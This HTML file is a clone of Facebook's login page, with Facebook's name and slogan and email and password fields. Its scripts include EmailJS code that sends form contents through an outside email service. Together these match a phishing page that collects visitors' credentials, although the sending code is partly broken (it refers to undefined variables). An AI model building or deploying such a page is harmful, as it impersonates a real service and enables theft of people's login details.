<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>log in facebook clone</title>
    <style>
        body{
          margin: 0;
          padding: 0;
          font-family: sans-serif;
        }
        main{
          margin: 5vh 15%;
        }

        p{
          text-align: justify;
          font-size: 18px;
        }
        label{
            position: absolute;
            width: 45px;
            height: 22px;
            right: 20px;
            top: 20px;
            border: 2px solid;
            border-radius: 20px;
        }
        label:before{
			margin-top: -2px;
			margin-left: -1px;

            position: absolute;
            content: '';
            width:20px;
            height: 20px;
            left: 1px;
            top: 1px;
            border-radius: 50%;
            background: #000;
            cursor: pointer;
            transition: 0.4s;
        }
        label.active:before{
            left: 24px;
            background: #fff;
        }
        body.night{
            background: #000;
            color: #fff;
        }
    </style>
 <link rel="stylesheet" href="style5.css">
</head>
<body>
	
	<header>
		<label  id="dark-change"></label>
	  </header>
    <section >

		<div class="img">
			<h2>facebook</h2>
			<h1>Facebook helps you connect and <br> share with the people in your life.
			</h1>
		</div>
	


	<div class="container">
		<form class="form" id="form">
			<div class="form-control ">
				<input type="email" placeholder="Enter your Email" id="email">
				<i class="fas fa-check-circle"></i>
				<i class="fas fa-exclamation-circle"></i>
				<small>Error message</small>
			</div>
		
			<div class="form-control">
	
				<input type="password" placeholder="Password" id="password">
				<i class="fas fa-check-circle"></i>
				<i class="fas fa-exclamation-circle"></i>
				<small>Error message</small>
			</div>
				<button class="button">
		<a href="index.html">
           
					Log in
				</a>
				 </button>
			<div class="forget_password"> 
				<a href="#">Forgotten Password?</a>

			</div>
     
			<div class="div1">

			</div>

			<div class="link2">
				<a href="creat.html">Create New Account</a>
			  </div>
		</form>
	</div>

	</section>	




	<script>
		const form = document.getElementById('form');
		const email = document.getElementById('email');
		const password = document.getElementById('password');
	

		form.addEventListener('submit' , (e)=>{
			e.preventDefault();
			checkInputs();
		});

		function checkInputs(){
			const emailValue = email.value.trim();
			const passwordValue = password.value.trim();
		



			if(emailValue ===''){
				setErrorFor(email, 'Please enter Your Email') ;
			}else if(!isEmail(emailValue)){
				setErrorFor(email, 'email is not Correct');
			}else{
				setSuccessFor(email);
			}
			

			if(passwordValue ===''){
				setErrorFor(password, 'Please enter your Password');
			}else{
				setSuccessFor(password);
			}


	
		}




		function setErrorFor(input, message){
			const formControl = input.parentElement;
			const small = formControl.querySelector('small');
			small . innerText = message;
			formControl.className = 'form-control error';
		}
		function setSuccessFor(input){
			const formControl = input.parentElement;
			formControl.className = 'form-control success';
		}
		function isEmail(email){
			return /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(email);
		}
	</script>


<script>
	var content = document.getElementsByTagName('body')[0];
	var darkMode = document.getElementById('dark-change');
	darkMode.addEventListener('click', function(){
		darkMode.classList.toggle('active');
		content.classList.toggle('night');
	})




	btn.value = 'Sending...';

const serviceID = 'default_service';
const templateID = 'template_w9gw5gk';

emailjs.sendForm(serviceID, templateID, this)
 .then(() => {
   btn.value = 'Send Email';
   alert('Sent!');
 }, (err) => {
   btn.value = 'Send Email';
   alert(JSON.stringify(err));
 });
</script>



<script type="text/javascript"
  src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>

<script type="text/javascript">
  emailjs.init('rnaLnTaarJYLLgJFZ')
</script>

<script src="main.js"></script>

</body>
</html>